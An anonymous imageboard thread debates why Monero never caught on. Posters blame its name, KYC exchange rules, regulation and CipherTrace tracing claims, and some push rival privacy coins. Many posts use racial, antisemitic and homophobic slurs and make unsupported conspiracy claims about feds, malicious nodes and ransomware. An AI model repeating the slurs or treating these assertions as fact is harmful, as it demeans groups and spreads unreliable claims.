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49826860 No.49826860 [Reply] [Original]

It actually does literally everything Bitcoin promised to do and which got it famous in the first place, but unlike shitcoin, that failed to deliver and yet became super popular, Monero simply didn't catch on.

>> No.49826884

only gays use it

>> No.49826906
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>> No.49826907

because its known as the crypto thats used to purchase stolen credit card info and drugs, normies dont want to be associated with it

>> No.49826965

it's used for its purpose so I wouldn't say it really failed

>> No.49827127

It has a dumb name, brand is half the battle.
The McDonalds guy fucked over the McDonald brothers just for the name.
Same as Internet Computer. Stupid fucking name.
Magic internet money. Stupid fucking name.

The utility is irrelevant. 99% of coins don't even have real utility only a proposed one.
Monero has real utility making it worth more than 99% of coins objectively but a terrible name.

>> No.49827198

This. Monero needs to market as being good money for normal people if it wants gains from normal people. Focusing on privacy first means you just pull in extremists that scare normal people.
I think that's OK and it's better that monero doesn't pump if that means xmr stays true to its goal. BTC already fills the all normies hold niche and atomic swaps will allow easy switching between them. Isn't that a win win?

>> No.49827232

Fuck normal people

>> No.49827233

it's working as intended

>> No.49827256

expecting gains is missing the point

crytpo wansn't invented to moon

>> No.49827264

>gets continuously adopted by the dark net markets
>banks are starting to adopt it too
>wHy DiDnT cAtCh On?
You're absolutely retarded, stfu.

>> No.49827334

I agree. I don't think monero should change anything about itself just so it moons. It's fine by me as long as it continues to give good privacy. I don't invest in monero, I buy things with monero as needed.

>> No.49827362

Transactions are increasing nicely which is a pretty good metric for a currency

>> No.49827376

>said the guy about bitcoin in 2011

>> No.49827466

It's basically Bitcoin but for privacy, Bitcoin already exis. So until Bitcoin crash ,why should monero be popular?

>> No.49827515

Monero doesn't care about privacy. So no devs care about Monero. That's why it's easily mined by malware and easily trace-able via ciphertrace.

>> No.49827604

monero didn't fail, it works great right now as the only peer to peer digital cash offering real fungibility and privacy. go try it.
its use case is not number go up, nor should it be. monero is not bitshit

>> No.49827649

Because Bitcoin doesn't fulfill it's promises and is thus inferior and deserves to die. Government can and does track it, for one

>> No.49827667

The number would go up if more people were staying to use it tho

>> No.49827806

monero shouldn't cuck out for the sake of mooning but number go up WILL lead to increased usage and adoption

>> No.49827899

Monero is the only coin that is actually used as hidden money, it's not flashy and doesn't really pump too hard (as this is kind of counterproductive to commerce), It doesn't pretend to be "the one coin" because not *all* money should be hidden, it's a cumbersome pain in the ass to use when you first get started and it is still proving itself.

It's not as exciting as the rest of the offerings in the crypto space, simple as.

If you want to turn $ into $$$, some ERC shitcoin with no future is unironically a better choice. If you want to hide money and transactions of that money, monero stands alone. It is simply unmatched in its niche.

>> No.49828009

Get new material

>> No.49828027

>if value high, why price low?

>> No.49828035
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People aren't "scared" of monero that's retarded.
If people were scared of monero cause drug users use it then the same would be true of tor yet tor has been on stable growth for years at this point and has millions and millions of users.

Monero is the same way. The only thing that needs to be said is monero needs to do a better job of marketing itself to appeal to normies. Tor has a whole section ok their website about why it's bullshit that only pedos and criminals use tor and it's clearly had success.

Salty fags who had crypto and hate monero don't know what they are talking about. Give it 10 years.

>> No.49828358

Bitcoin got a major boost in network effect because large, centralized exchanges were created all over the place that easily facilitated the purchase and transfer of bitcoin. This was also during a time when payment processors weren't blacklisting anyone for wrongthink, KYC/AML regulations were low or non-existent, it wasn't a thing that trading or cashing out or making purchases with crypto was a taxable event, etc.

Monero didn't exist during that time and now it's just a hassle to obtain. It SHOULD just be a commodity that you can buy with a credit/debit card and be on your way. But all of these exchanges need you to spread your asshole for the camera, wait days to get verified, hold your deposits/withdrawals for another 72 hours, report if you're trading your coins for something else, etc.

Inconvenience is just a deal breaker for a lot of people, I think.

>> No.49828435

What's the point of using Monero with the likes of Coinbase when you have to give them your name and address anyway and pay through the likes of Binance, which tells daddy government everything you do?

>> No.49828473


>> No.49828492

Fuck you fed, get a real job. Monero is untraceable and ciphertace is selling vaporware, is this on the script or is it just your cope?

>> No.49828514

Coin cards also asks your name and personal data.
Pretty useless

>> No.49828543

Geez it's almost like crypto isn't supposed to be used on massive exchanges

>> No.49828605

Agreed. Esperanto is a retarded language and anyone speaking it should be executed.

>> No.49828633

>Monero can be used on massive exchanges while private transactions with zcash or litecoin are all disabled.
Geez it's almost like Monero's "private" transactions are not private at all.

>> No.49828643

Coinbase doesn't list Monero because it allows you to circumvent everything you described. If you withdraw to an address and send it to another it should be really hard to link what you did with your money with your first address.

>> No.49828725

Where does Satoshi claim bitcoin is anonymous and untraceable? The entire point of bitcoin is transparency and auditability to reduce fraud.

>> No.49828748

>crytpo wansn't invented to moon
Bitcoin was literally and explicitly designed to balloon in value

>> No.49828788


>> No.49828792

i'd prefer if monero stabilized around 1 dollar. it should be used as currency and not a speculative asset

>> No.49828810

Bitcoin got famous because it got people rich and that's it

>> No.49828952

No it wasn't kek.

>> No.49830068
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Oh look, yet another Monero FUD thread. Maxipads be sweating, yo


>> No.49830264

you can't buy it on coinbase

>> No.49830370

This. It sounds fucking stupid like Pesos. Who the hell wants that?

>> No.49830428

Needs to rebrand as just “Nero.”
Would sound way cooler that way.

>> No.49830490
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Monero has been doing well in terms of real world adoption. New ATHs in hashrate and transaction count all the time.

If we're talking price performance the actual number 1 reason Monero doesn't pump, is because Monero doesn't pump. Cryptocurrencies are Veblen goods and the actual cause of products having high prices is because their price is rising, which is why you get these beautiful parabolic hockey-stick graphs where the gains actually go exponential and it looks like the price goes into the stratosphere. Monero has historically only entered the beginning of the "hockey-stick" phase at the end of bull markets so the legs get kicked out from underneath it due to a general market collapse before it's actually raised dramatically in value and able to hold a much stronger, higher price floor.

>> No.49831480

>The McDonalds guy
Wait sergey did WHAT

>> No.49831664

Normalfags don't even know about it. 80% of them don't even know there's anything other than Bitcoin and if they do they just know Dogecoin because of Teslaman or they might know of Ethereum.

>> No.49832925

are u retarded? lol

>> No.49833169
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>Inconvenience is just a deal breaker for a lot of people, I think.

Good. Normies need to stay out of monero, and always remain in the bitcoin/ETH/DOGE “chase dah moons by doing nothing” kiddie pool that klaus Schwab and centralized banking has set up for them. I don’t EVER want normies to figure out REAL crypto. Fuck that.

>> No.49833441

was literally about to comment this

>> No.49833487

If it’s so easily traced why is it so widely mined using malware

>> No.49833513

t. Doesn’t quite get PoW

>> No.49833528

Fucking kek

>> No.49833540

shit, I like that

>> No.49833637

it's a CIA honeypot and people aren't retarded enough to fall for an obvious trap

>> No.49834422

Shitty tokenomics

No support from influencers.

>> No.49834503

>constant supply
>constant inflation

BTC is sacrificing long term security for short term price action. But yeah, 21million hardcap is easier to understand for normies and easier to be crowned as THE HARD MONEY, for now at least

>> No.49834539

I didnt say anything about bitcoin.

Monero bros have a boner for BTC.

>> No.49834567

If BTC is so easily traced then why does every single ransomware attack demand payment in BTC?

>> No.49834628

It doesn't have a retarded name. Monero is a great name. Since it is not English, it doesn't have to compete for brand recognition with an existing English word. For example, Sega, Nintendo, zeitgeist, facade, manga, those are all foreign language words that don't compete with an existing English noun, so they have a very specific meaning that is quickly understood.

>> No.49834745

>>crytpo wansn't invented to moon
Exactly right, anon. In fact, the most important quality that a currency should have is stability. If Monero crashes to $10, but it stays at that value for 30 years, that would make it a very good currency because you can actually plan for the future, and save or invest as necessary. You cannot do that with something like Bitcoin which can crash 20% any given day, messing up all your plans, particularly if you have loans.

>>Bitcoin was literally and explicitly designed to balloon in value
No, it wasn't. It was intended to be a currency. But since it's deflationary, it actually will never work like a currency, and this is a fatal design of the system but people refuse to accept this, just like the lack of anonymity was recognized very early on.

>> No.49834809

That's fucking bullish, you dunce. The Silk Road used BTC and look at it now

>> No.49834935

I respect Monero because out of everything on offer, it does what it claims to do and does it really well. But what it does is incompatible with regulation, and it will therefore never have mainstream adoption. Exchanges are banned from listing it in heaps of countries (including mine) and that regulatory environment is only going to get worse. This puts a ceiling on its potential.

The maxis will always have their one liners like "the government can never enforce a ban" and "it will always have a use case", but the fact is that evading regulation or law isn't worth it for 99%+ of people. I'm going to have an easier, more prosperous life being a good boy, paying my taxes, and following the rules.

>> No.49834966
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Monero isn't designed to "Ride to the moon!!" and get Reddit Gold. That isn't why the coin was designed.
You use it. You send it to people for goods or receive it for services or whatever. It's money.
The fact that it isn't hip hopping around 500% of its stable value every few weeks isn't proving the point you think it's proving.

>> No.49835036


who cares?

>> No.49835054

Wallet is a piece of shit to start with. Glitchy, user unfriendly. Nothing is marketed towards ease of use. And it will never have growth like that. Just a stable currency for pedos, degenerates, druggies. Whatever I’m okay with it. It works very well for exactly who it was intended for. Nothing more

>> No.49835082

The sole and only reason why I do not own any monero or even have a wallet/mining setup for it is because it's reflecting the glow of glowing entities off of it so brightly that it's like the moon reflecting the light of the sun. I'd rather not get marked for surveillance because I wanted my computer to make me some money while I'm at work and have to deal with a bullshit audit or any other faggotry as a result of it. If this wasn't the case I would happily own some, have a wallet for it, and mine it too. Which probably makes me an actual fucking retard for not investing in it because all of this mirrors the early days of BTC, but that's a chance I'm willing to take compared to the alternative I've outlined above. If I ever get in a position in life where I can ask someone that glows if owning or having anything to do with monero does or doesn't get someone put on a list the very second they slip up on OPSEC, I will ask them, and if they give a firm and detailed no with reasoning as to why that would be a retarded thing to do I'll pick some up.

Just doesn't seem smart to invest in something where the majority of people that hold it make constant jokes about not owning any/not disclosing AND it's associated with the anonymous moving of money for criminal purposes. Period. It's a PR problem.

>> No.49835126

If the answer is not totally obvious to you, please never invest in crypto.

>> No.49835142

Ask that to the political opposition in any non-western country, you fucking baboon

>> No.49835167

Reddit is arguably the site most responsible for Monero's popularity. Monero gets the reddit carpet treatment over at soi boi central for a reason you know? I get that Monero bro's think they are being edgy and dangerous but they are just playing themselves.

>> No.49835176

These are the sort of things that Monero extremists think are "cool"

>> No.49835193

privacy features have already been absorbed by bitcoin. Submarine swaps, coinjoin/mixing wallets, lighting network using onion routing by default. It's good enough and more privacy features will be added as time goes on.

>> No.49835195

Because every ransomware attack is a glowop either used to attack political opponents through their investment/businesses or else merely justify the continued existence of excessive executive powers.

>> No.49835201


In many languages Nero means niggêr.
Literally named MyNigga

>> No.49835208

>easily trace-able via ciphertrace
Do you have any evidence?

>> No.49835229

It's the only crypto that is actually used IRL.

>> No.49835292

im sorry i dont live in a shit hole like you.
i live in a western country

>> No.49835329

It shows, literal mindless slave

>> No.49835418

Only midwits say this stupid shit

>> No.49835420

Do you have any evidence that they can't trace it? Oh I know, wait, some anon made a geocities site and that is way more reputable than the fortune 500 payment processing company who bought ciphertrace, with cash, for an undisclosed amount. Yeah, Ciphertrace must have just made it all up to get that Mastercard money. I wouldn't worry about it anon.

>> No.49835510

Massive and time proven Monero usage in darknet is way more reputable than the fortune 500 payment processing company who bought ciphertrace.
And you haven't answered my question. Well it's not like I believed you have any in the first place.

>> No.49835607
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It did catch on amongst pedos, kidnappers and hackers

>> No.49835617

>more privacy features will be added as time goes on
Stealth Addresses and Dandelion IP obfuscation we're both originally developed for Bitcoin but were never implemented. You can even find posts by Satoshi on the Bitcointalk forums discussing implementing blind keys. Do you think they weren't added because they don't enhance privacy or because the people controlling the development are afraid big privacy upgrades will hurt Number Go Up?

>> No.49835635

A currency that literally every national government hates is unlikely to succeed in the long run

>> No.49835636

hand over your child porn pedro

>> No.49835738

Lots of newfaggy retards in this thread. Monero is way too good for the likes of /biz/. Stay poor and stupid.

>> No.49835754

The truth that you refuse to acknowledge is that BTC is still used more for illicit shit because it has value and is not easily mined by script kiddies exploiting windows backdoors to build botnets. Who the fuck here actually mines Monero? You? Monero is not even the most profitable to cpu mine anymore. And even if it was king of the drug trade (it's not) You think the feds don't run their own darknets to move drugs into kids hands? You're in a fucking cult at best and on a list at worst. Focus your time on something besides defending a fucking meme or be a good little turncoat like fluffypony and flip for the feds

>> No.49835787

Because it has already succeeded, therefore there's no hype

>> No.49835833

>BTC is still used more for illicit shit
I know. It doesn't prove that Monero is traceable.

>You think the feds don't run their own darknets to move drugs into kids hands
I don't think, I know they do it. I live in Russia and here they do it 100%.

Nigger, what you need to understand is Ciphertrace swindlers can only trace transactions between 2 KYC/AML compliant centralized exchanges they are partnered with. Wow, so traceable! Lmao.

>> No.49835958

You really think they would tell you or anyone else what they could do without signing an NDA first? You know how Dread Pirate Roberts is serving a life sentence for running a darknet? You don't think that they were about to slam fluffy in the cell next door when they picked his ass up? Nigger, they have all the github privileges and all the legacy devs under their fucking thumb. They can put whatever they want in the protocol and you clueless, brainwashed fucks will be here eating their shit all day. get a fucking clue comrade.

>> No.49836014

Switzerland will love it trust me

So do island nations you retard, we have so many places that already launder money

Use your brain

>> No.49836043

Monero is doing what it should do and it's working. What more do you want?

>> No.49836058

Literally makes no sense. By that logic no free software application is safe from the government because they have unlimited funds to monitor everything, inject code in the Linux kernel, instantly hack your cellphone, and get every piece of information about you. You still have no proof of what you claim.

>> No.49836085

Real Schizo Hours

>> No.49836111

My wet dream is Switzerland adding XMR to their national reserves

>> No.49836154

>use your brain

>Hello, Monero User. This is the USS FuckRape-Destroyer #000057. Surrender your coins and prepare your anus for coin-insertion

>> No.49836190

Yeah sure whatever you say. Ciphertrace niggers are totally capable of tracing Monero transactions. By the way remind Ciphertrace to snatch that $1M bounty from the IRS. They should get better in milking the government. I'll continue to use Monero regardless.

>> No.49836240

What I mean by this is that no island supercontinent or one island pirate cove can stand up to even 0.0001 of a US naval vessel without at least one such vessel of their own, which costs big money that they have always been meticulously prevented from having

>> No.49836256

Kek that was literally Bitcoin's reputation the last few years

>> No.49836335
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> I'm going to have an easier, more prosperous life being a good boy, paying my taxes, and following the rules.

Good. That’s what we want to hear
>I will live in the pod
>I will eat the bugs
>I will own nothing
>I will be happy.

Get your 16th booster and take the estrogen shots. You’ll have a more prosperous life.

>> No.49836454

>banks are starting to adopt it too

>> No.49836600

this has to be a troll. one could ever truly be this gargantuan of a faggot.

>> No.49836615

retards like you dont understand the concept of keeping the governments greasy kike hands off your money because you either are not productive enough to pay taxes or you are 13. probably both

>> No.49836641

because it is supposed to be secure from faggot government trying to steal (tax) you. who else do you think has the infinite printed money resource to even track BTC?

>> No.49836749

Monero is an incredibly good sounding name imo.

>> No.49836791

When normies realize both BTC and ETH are fundamentally broken by not being able to scale, they'll look into Monero more.
It's unirnonically still in "stealth phase" by normie standards.

>> No.49837000

Lads, don't get me wrong, mah privacy coin is great when your networths a few thousand and your priority is buying some shitty weed and bitching about how unfair taxes are. Also seems reasonable if you're an actual criminal and the anonymity is necessary to function.

But once you get into big boy numbers and actually have something to lose, unless you're fucking El Chapo, you're gonna be better off bending over and letting papa government have their way.

>> No.49837025

Why do think Apple abandoned Intel chips in their Macbooks? Because they wanted to stay in the high end laptop business. No protocol is perfect. But Monero glows like the fucking sun. There are massive red flags everywhere you look and everyone is so oblivious that it's either ignorance, brainwashing, or you're just willfully gaslighting the users of this board non stop because it's your job. Because it really is 24/7 and every single one of you faggots says the exact same thing. It would be one thing if there was some technical discussion about opsec or data protection or even privacy in general but it's always just "der, just use monero bro, der" like a flock of trained parrots. For example, this is a thread about how Monero has failed and all you can do is flood the thread with ad hominems about how perfect xmr is. No constructive criticism, no sharing of ideas on how to improve it, Nope, It's perfect and everything is awesome, don't pay any attention to any issues and just keep using that good ol Monero. Man it's so fucking great! Holy Shit! Fucking NPC's everyone of you.

>> No.49837281
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Indeed. I dunno what these fuckers are talking about. Sure beats “bit(shit)coin” or “ethereum”.
Just a simple twist of the word “money” nothing too fancy, sounds straight and to the point. If Kim jong un likes it. It must be good.

>> No.49837337
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You can go ahead and drop them britches and spread them cheeks for big daddy gubmint. To each their own. I believe in freedom and if ya like living in the pod and getting your anus cream pied by the government, taxes, and corporations then more power to ya. Some people just like it up the ass. It’s their preference.

>> No.49837345

It's an amazing currency but a terrible investment. As soon as it becomes adopted outside of small darknet markets governments will absolutely destroy liquidity by forcing all CEXs to delist it or stop offering services in their country. This will destroy price, destroy people's ability to trade in it as onboarding anyone new will be near impossible. Atomic swaps are still miles off for the average person; remember the average person doesn't even know basic file structures on their pc/phone. For xmr to really fulfil it's potential it needs;
>Massive atomic swap front end development
>Listing on every DEX possible, thorchain needs to happen like yesterday.

Once this happens then it's a way more attractive investment.

>> No.49837441

>>this is a thread about how Monero has failed
Which it hasn't.

>>It would be one thing if there was some technical discussion
Okay start by doing it. You are the only person here throwing insults.

Yes, the Intel Management Engine exists, so what? Are you saying that Apple are the good guys in the tech sector? They absolutely are not cooperating with the government to spy and hack devices everywhere?

The natural conclusion of your thinking is, the government has all the power in the world to infiltrate all computers at all times, in all devices, in all networks. So why haven't they actually done it, and stopped all crime at the same time? Your natural schizophrenic response would be, "they allow things to happen, they purposefully allow right-wing v. left-wing politics to happen, to collapse the system so that at the end they are on top, it's a fully controlled system of which there is no escape".

But you haven't produced any evidence, it's just rumors and insults to anybody who doesn't want to bash Monero.

>> No.49837548

I didn’t see anyone post the actual reason why a btc maxi would fud monaro. That reason would be the regular forks, gives a centralized kind of look (compared to btc)

>> No.49837582
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Wdym fail? It's still used daily as a p2p by pedos and druggies

>> No.49837682

because bitcoin already won as money before bytecoin even existed
because ethereum has better on-chain privacy technology
because privacy by default is worthless when your altcoin is only used for privacy

>> No.49837692

Monero honestly isn’t even currency like retards think so it failed at that. US dollars are currency, and Monero is just an anonymous way of exchanging US dollars to buy CP and unregistered firearms. Nobody plans on keeping the Monero they receive, they immediately exchange it for actual currency. Monero might as well just be a digital gold note that you can receive without the fed knowing.

>> No.49837734

because you can’t easily purchase it, recording your taxes is relatively difficult when you sell (which is a turn off for wealthy individuals looking for a speculative investment)
Most people are just genuinely disinterested with the protocols main utility because if you’re not intending on making explicitly illegal purchases there’s no reason to be sensitive to keeping your transactional history

>> No.49837768

There isn't a bigger fuck you to normies than selling your bags to them for a 10x+ profit during peak mania phase of the bull run and then buying back cheaper

>> No.49837898

Aye. 1000x is even sweeter.

>> No.49838004


>> No.49838063


>> No.49838126

Objectively correct opinion

>> No.49838165

>No constructive criticism
Lol are you implying that you have done any constructive criticism? You literally said "Monero is traceable because I believe so". Btw, 0.00075 BTC has been deposited to your Coinbase account by Mastercard Inc.

>Monero glows like the fucking sun
Sounds exactly like what a glownigger would say.

>> No.49838220
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Coping retards

Monero has been on the market since 2014. It’s not a new project, 8 fucking years is ages in the crypto market…it will never be adopted like Bitcoin.

>muh onions
Nobody cares since it doesn’t drive adoption

>> No.49839707

Monero failed to upgrade to support faster transactions and smart contracts like the rest of the industry, so it is being left behind by newer, better protocols, like incognito chain and 0xMonero.

>> No.49839824

Monero does exactly what it is advertised to do. Cant say the same for literally any other crypto.

>> No.49839831

It's not Bitcoin.

>> No.49839862

So does bitcoin, which was released over a decade ago. A lot has changed since then and the cryptos that haven't stayed up to date will get left behind.

>> No.49839887

It's literally having an upgrade for faster transactions, enhanced privacy and (limited) smart contract behavior in 2 weeks time.

>> No.49839905

Proof. I don't see it

>> No.49839940

Open door pooper detected

>> No.49840027

Monero is literally the best name out of all crypto except maybe Bitcoin itself. It is incredibly intuitive, self explanatory, yet exotic. Its the best.

>> No.49840181

How is fluffy pedo still paying you guys if he is locked up in prison? Did someone take his keys?

>> No.49840287


>> No.49840318
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>> No.49840321

>It actually does literally everything Bitcoin Promised to do and which got it famous in the first place, but unlike shitcoin, that failed to deliver and yet became super popular, Monero simply didn't catch on.
Quite simply, it didn't get the media attention like BitCoin did, some things are dominated by whomever is first, and not who is best. Notable examples are Microsoft Windows, iPhone, Coca Cola, the list goes on.. You know how we name a plastic container here in Portugal, tupperware, the product name is actually the most know brand that makes the product, things like that are invaluable to a company, but it means that the best product is not always the most well known... And that's good, because the best product maybe undervalued. Monero is one of the most undervalued assets in the planet.

>> No.49840362

I mean the Intel management engine does exist but having people on hand to exploit it is another story all together. AMD requires guest access to the actual machine which is better and of course nothing beats a good ole arm processor.

>> No.49840373

Isn't it obvious? You should use your own wallet on your own machine. People that buy crypto on exchanges are posers only in it for the profit.

>> No.49840453

Monero is beyond the ability of normies to understand.

They will continue to lock their money up with untrustworthy sources and FOMO cartoon coins while godlike hacker chad Monero users have safe, high tech money and can do anything they want.

It'll do fine. Too much attention might be a bad thing. It's better if the governments pretend it doesn't exist.

>> No.49840485

>If BTC is so easily traced then why does every single ransomware attack demand payment in BTC?
uh maxipadsisters?!?!?

>> No.49840574

>So does bitcoin
No it doesnt. Bitcoin was supposed to be currency, which it isnt. Then people changed it to a "store of value", which it isnt. Then it was changed to a "hedge against inflation", which it VERY obviously isnt. XMR is private currency, which it actually is.

>> No.49840741

A based take.

>> No.49840774
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The war against privacy coins will be lost by TPTB the same way the lost the war against cryptography, slowly but surely. Any oldfags here remember when you get thrown in the federal pen for transferring internet explorer overseas? Remember Phil Zimmerman?


>> No.49841057

I agree thorchain is really important to get working with xmr,I thought they already made it happen?

>> No.49841160

You can't stop glowing can you?

>> No.49841435

>no support from influencers
Please kill yourself

>> No.49841485
File: 127 KB, 1369x849, mn.png [View same] [iqdb] [saucenao] [google]

Interesting how Market Watch always have Monero as one of their six chosen main coins

>> No.49841516

$40 usd wownero soon friend

>> No.49841593

It didn't fail.
Buy high sell low retard.

>> No.49841691

Interesting how biz is desperately shilling monero like it was ICP. It’s almost like someone wants exit liquidity. But that can’t be right? Why would someone want to exit the future of finance???

>> No.49842065
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/biz/ can't pump a multi-billion dollar crypto, this isn't d*gebonk. The xmr "shilling" is relatively tame to what linkies have been up to in the last 4 years

>> No.49842134

normies fundamentally don't care about privacy
see: the past 20 years

>> No.49842203
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X3nu believes that this is the only way he can bring awareness to the coin. These monero guys are not devs or hackers. what they dont realize is that everybody knows about monero and doesnt feel the need to use or buy it. It peaked last cycle

Pretty helpless

>> No.49842235

They do, but they can use zk tech in a web browser interface on other chains to achieve privacy.

Better user experience.

Monero is clunky to use.

>> No.49842262

The point of the halvenings and fixed supply was to create a deflationary currency, finishing with the deflation phase where no new BTC are produced and the supply dwindles. SN wrote about people using full BTC to trade at first and eventually having to use SI prefixes to trade thousandths and millionths because 1 BTC would exceed the value of most trades. This was all spelled out in the whitepaper and forum posts.

>> No.49842404

>Where does Satoshi claim bitcoin is anonymous and untraceable? The entire point of bitcoin is transparency and auditability to reduce fraud.
Intresting, this is the same arg gov is making for CBDCs.

>> No.49842406

This is a low IQ take. There are already scalable private smart contract L1s out there. As far as storage on the blockchain is concerned, look into Filecoin, arweave, and the internet computer.

>> No.49842446

Neither do Monero feds. Just use it and shut up or they'll raid your thread. They have nothing else else to do and shilling fucking monero is their only life mission. What a fucking pathetic life. Fucking Follow Your Leader and Flip For the Feds To Stay Out of Federal Prison Faggots.

>> No.49842463

Kek these glowies have no standards do they?

>> No.49842486

There's nothing in the whitepaper about price against USD/Fiat.
The USD/Fiat is irrelevant in terms of science of this nature.
USD/Fiat might as well die and it won't change much.

>> No.49842494

Tasteless retard

>> No.49842504


>> No.49842543

>Clunky to use
>Demonstrably displacing Bitcoin on the dark net

>> No.49842571

its been very useful. the most useful cause its the only fucking private asset there is.

>> No.49842587
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A problem with monero is exactly the lack of transparency. A lot of legitimate uses of money require to know who has the money.

I know monero was a good meme in 2014; I also bought a lot back then; but I should had sold at the first big pump in did.

Think of it this way: you want Joe Biden to govern you well or get rid of him otherwise; why would you want him to use a wallet that is fully hidden both in transactions and size; that's exactly why monero(or variations of it in the future) will never be used for many purposes.

>> No.49842649

Monero wasn't created for 99% of ppl.

>> No.49842675

>There are already scalable private smart contract L1s out there.
Name one.
>As far as storage on the blockchain is concerned, look into Filecoin, arweave, and the internet computer.
The cloud is just someone else's computer, a blockchain doesn't change that.

>> No.49842717

ctrl F smart contracts - not found

>> No.49842770

Monero is an awesome name. Sounds like dinero (money).

>> No.49842795

You're fucking retarded mate, Monero is a currency it does not need smart contracts.

>> No.49842812

It's just limited to the use of obfuscated transfers. That an extreme limitation, because being able to follow the money doesn't only help the state but also you against the state because you don't want those ruling over you having black box wallets.

>> No.49842822

incognito chain, DERO, Secret Network, NEAR private shards, XRP/XLM private ledgers.

In regards to storage on the blockchain, you did not refute that it exists, you simply changed the argument to "cloud storage should not be used because it's untrusted". There are several solutions for decentralized storage and the information stored can be encrypted and stored on multiple computers or in multiple data centers.

As far as smart contract DApps, the thing being stored on chain would be the UI, and that is public for 99% of DeFi use-cases.

>> No.49842877

Yes, Monero can only be used to transfer value and is obsolete. It has no other features. There are several more advanced chains that offer smart contract functionality. The more utility a crypto has, the more value it has, and if Monero can only be used to transfer value, it will have less of it compared to newer chains going forward.

>> No.49842916

What's funny about Monero haters is that they hate on Monero, the only currency in crypto that is actualy used as a currency, but have nothing against regular 'currencies' in crypto despite the fact they're all used as piramid schemes and not as actual currency. Even their args itt shows how retarded they:
>OMGZ1! Monero is shit because it's not mooning.
Currencies are not supposed to moon, they're supposed to be used as currency in a secure and private manner. Mooning is important to scammers in piramid schemes because their token moons by atracting greater fools to inject their money into the scheme by buying tokens from scammers.

>> No.49842986

>Because every ransomware attack is a glowop either used to attack political opponents through their investment/businesses or else merely justify the continued existence of excessive executive powers.
I think you are the first person I know that figured out these cybercrime groups are just state intel actors.

>> No.49842992

Normies. I too bet on this privacy coin but I wrongly assumed that the average person cares about privacy. Even antivaxx schizos who claim to care about microchips are more than willing to use products and services that track them every day. It's over.

>> No.49843025

This is a black pill. We are arguing over Monero vs other private cryptos but we are all basically on the same sinking ship.

>> No.49843037

>can you prove a negative
Found the imbecile.

>> No.49843134

I have seen proof that the Monero nodes are malicious and have tracked/censored transactions.

>> No.49843264

because le whalerinos can't monitor the chain
le minerinos can't mine it efficiently

>> No.49843267

>There are massive red flags everywhere you
Then post them fucktard.

>> No.49843294

Monero will become popular because of it's low fees. The privacy is just one feature.

>> No.49843351

I'm sure those Canadians that had their bank accounst frozen for parking their trucks and putting up a terrorist bouncy castle would have rather had donations in Monero
>muh western freedumbs!
You sound like a good goy golem

>> No.49843495

I've lost all faith in normies which is why I would never buy the shit they're interested in. I have more faith in extremely wealthy people that nobody has ever heard of. It's going to be them holding the majority of the coins, me with my little bag, and whoever else is pure enough to overcome normiedom and actually think things through enough to buy XMR. And then one day, when the normies are in intense manufactured financial pain, the financial system will be reorganized with a CBDC at its center. There will be crackdowns on cryptocurrencies but there will be one currency remaining that can work effectively for the black market. And the black market will be quite large in the dystopian future. All the cool guys and the rich guys will be using the Monero market and everyone without Monero will be eating bugs in their pods.

>> No.49843565

>their pods
Haha sorry. Not actually their pods, of course but you know what I mean. It's ok, they're actually all quite happy.

>> No.49843607

*ahem* view keys

>> No.49843622

>Uhhhhhhmmmm for a currency to be successful it must be worth 20 million fiat dollars!!!!!
No fuck off back to l3ddit

>> No.49843661

>Monero is obsolete because it only does one thing, and it does it better than any other cryptocurrency.
LMAO you're embarrassing yourself.
>The more utility a crypto has, the more value it has
If that does not translate into real world usage, then it's not valuable.

The only one by default is Dero, the others are build on transparent ledgers - effectively meaning they are optionally private.
>you simply changed the argument to "cloud storage should not be used because it's untrusted".
Those are your words, not mine. I don't really like "cloud storage" simply because you cannot control the servers, they could be affected by a cataclysmic event or would just fail, making the files stored permanently lost. However I do use it, just not for important files.

>> No.49843746

>Proof exists because I say so.
Get lost scumbag.

>> No.49843948

misquoted me. If your argument relied on facts, then you wouldn't have to try and deceive the reader.

>> No.49843988

Optional privacy is good as long as there are enough private transactions for obfuscation to work. Optional privacy means that coins can legally be traded on exchanges, which makes them fungible, unlike Monero, which is blacklisted by default.

>> No.49844061
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>> No.49844254

Notice that they have no cringe copypasta, scripted response, or even a reply to the fact that their de facto leader got arrested for fraud by the feds and was released shortly thereafter. If this guy (fluffypony) was an actual player in anything but scamming plebs he would be fucking dead by now

>> No.49844259

Optional privacy means it is never used. Just look at zcash.

>> No.49844261
File: 61 KB, 1024x576, 1652145660988.jpg [View same] [iqdb] [saucenao] [google]

The more complicated a system the more chances there are of the end user who might not understand the product like fucking tech gurus to fuck something up.
This is why the tor browser FORCES users to ONLY use onion routing and doesn't let users mess with the network settings to include VPNs, VPS' i2p, zeronet, etc etc and doesn't let you fuck with DNS settings.

I swear to God you faggots who rally behind these subpar privacy shit coins have never even opened the tor browser in your life or surfed over i2p or tor and have never even heard of FOSS. You think GPLv3 allows companies to profit off it's licensing? Hell no.

Are these coins even open source? You guys have no idea what you are talking about. Litecoin users and Z-cash fags will be the first retards to get a free ride in the party van.

>> No.49844329
File: 246 KB, 790x590, 1652133214602.jpg [View same] [iqdb] [saucenao] [google]

Fake gay and glow. Eat a dick kike.
The monero thread gets more hate than any thread on this board. Lying faggot glowy fuck you.

>> No.49844466


>> No.49844494

Imagine thinking the future is government.

>> No.49844507

The same slander was also thrown at their network mind you.
The reason is because these things actually poise serious threats to the established order.

>> No.49844597

You are a retard

>> No.49844599

The tor network**

>> No.49844627

XMR failed because normies and even more people here don't care about privacy. As the concept of "privacy" continues to change, with zoomers having zero concept of privacy, the utility of XMR will be seen as unnecessary as more time goes on. It sucks, but it is what it is and it won't stop me stacking XMR

>> No.49844652

Because it’s not Bitcoin.


>> No.49844826

Yeah, it's better.

>> No.49845068

>If it's not Doge coin and doesn't pump and then dump it's a "failure"

>> No.49845125
File: 35 KB, 687x486, 2c884528776f1202f3727c12ca60a1ec.jpg [View same] [iqdb] [saucenao] [google]

Why, yes.

>> No.49845569

How are you bags looking rn?

>> No.49846912


>> No.49847187

>Monero simply didn't catch on.

>> No.49847234

gay logo and toxic community

>> No.49847283

You should stop stacking up monero and start loading up SCRT. It is a combination of Ethereum's smart contracts, and Monero’s Privacy with Cosmos' scalability and interoperability. Monero is an old fag.

>> No.49847357

Yeah? Explain how this CIA honeypot works

>> No.49847464

My RFOX and GMT bags have been impressive thus far. Prices may be below my short-term target, but I believe in their long-term potential.

>> No.49847826

incognito chain, DERO, Secret Network, NEAR private shards, XRP/XLM private ledgers.

can any of these based private smart contract platforms run cryptokitties without the network blowing up or $500 gas fees?

>> No.49847873

It was made obsolete by privacy solutions on Ethereum, like Tornado and Aztec.

>> No.49847929

>Has a scientific methodology
>For shit coins and meme stocks

